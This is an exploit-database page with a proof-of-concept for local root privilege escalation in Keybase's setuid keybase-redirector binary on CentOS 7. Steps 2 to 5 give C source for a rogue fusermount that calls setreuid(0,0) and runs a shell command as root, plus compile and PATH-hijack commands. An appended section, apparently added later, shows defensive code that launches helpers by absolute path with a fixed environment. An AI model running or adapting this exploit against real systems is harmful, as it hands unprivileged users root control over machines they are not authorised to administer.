0day.today - Biggest Exploit Database in the World.
Keybase keybase-redirector - ($PATH) Local Privilege Escalation Exploit
Risk: Security Risk High
keybase-redirector is a setuid root binary. keybase-redirector calls the fusermount binary using a relative path, and the application trusts the value of $PATH. This allows a local, unprivileged user to trick the application into executing a custom fusermount binary as root.

## Environment

CentOS Linux release 7.4.1708 (Core)
3.10.0-693.17.1.el7.x86_64

RPM info

```
Name        : keybase
Version     : 2.8.0.20181017144746.3efc4cbf3c
Release     : 1
Architecture: x86_64
Install Date: Mon 22 Oct 2018 05:30:36 PM EDT
Group       : Unspecified
Size        : 273302678
License     : BSD
Signature   : RSA/SHA256, Wed 17 Oct 2018 10:55:21 AM EDT, Key ID 47484e50656d16c7
Source RPM  : keybase-2.8.0.20181017144746.3efc4cbf3c-1.src.rpm
Build Date  : Wed 17 Oct 2018 10:54:47 AM EDT
Build Host  : 6ae61e160e87
Relocations : (not relocatable)
Summary     : Keybase command line client
Description : Keybase command line client
```

An unprivileged user named user1 is used for this PoC.

## Steps to reproduce

1) Display the privileges of user1 by executing the id command.

```
[user1@localhost woot]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```

2) Create a custom fusermount application. This PoC will create /w00t as root. Arbitrary commands can be executed.

```
cat >fusermount.c<<EOF
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    setreuid(0,0);
    system("/usr/bin/touch /w00t");
    return(0);
}
EOF
```

3) Compile fusermount.c.

```
gcc -Wall fusermount.c -o fusermount
```

4) Verify that /w00t does not exist.

```
[user1@localhost woot]$ ls -ld /w00t
ls: cannot access /w00t: No such file or directory
```

5) Prepend a dot (the current working directory) to the PATH environment variable and execute keybase-redirector, which in turn will execute the malicious fusermount binary as root.

```
env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
```

6) Enter the control-c sequence to kill the application.

```
[user1@localhost woot]$ env PATH=.:$PATH /usr/bin/keybase-redirector /keybase
^C
```

7) Verify that /w00t exists.

```
[user1@localhost woot]$ ls -ld /w00t
-rw-rw-r--. 1 root user1 0 Oct 22 16:34 /w00t
[user1@localhost woot]$
```

## Impact

Unauthorized root access is possible, which impacts the confidentiality, integrity, and availability of the system.

# 0day.today [2024-12-25] #
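The root cause described above is a privileged program resolving its helper through the caller's $PATH. The following added example (not part of the original advisory and not Keybase's code) shows the defensive pattern for launching a helper from a setuid program: absolute path only, `execve()` instead of a PATH-searching call, and a fixed environment. The names `run_helper` and `SAFE_ENV` and the `/usr/bin/fusermount` location are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the helper. Nothing is inherited from the
 * caller, so a user-controlled PATH or LD_* variable never reaches it. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Run a helper by absolute path; return its exit status, or -1 on error.
 * execve() performs no PATH search, unlike execvp() or system(). */
int run_helper(const char *abs_path, char *const argv[])
{
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                  /* refuse anything resolved via PATH */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);                 /* exec failed (e.g. helper missing) */
    }

    int status;
    while (waitpid(pid, &status, 0) < 0) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Assumed install location of the real helper; adjust per distro. */
    char *const argv[] = { "fusermount", "-V", NULL };
    int rc = run_helper("/usr/bin/fusermount", argv);
    printf("helper exit status: %d\n", rc);
    return rc == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

With this pattern, the `env PATH=.:$PATH` prefix from step 5 has no effect on which binary is executed, because the lookup never consults the environment.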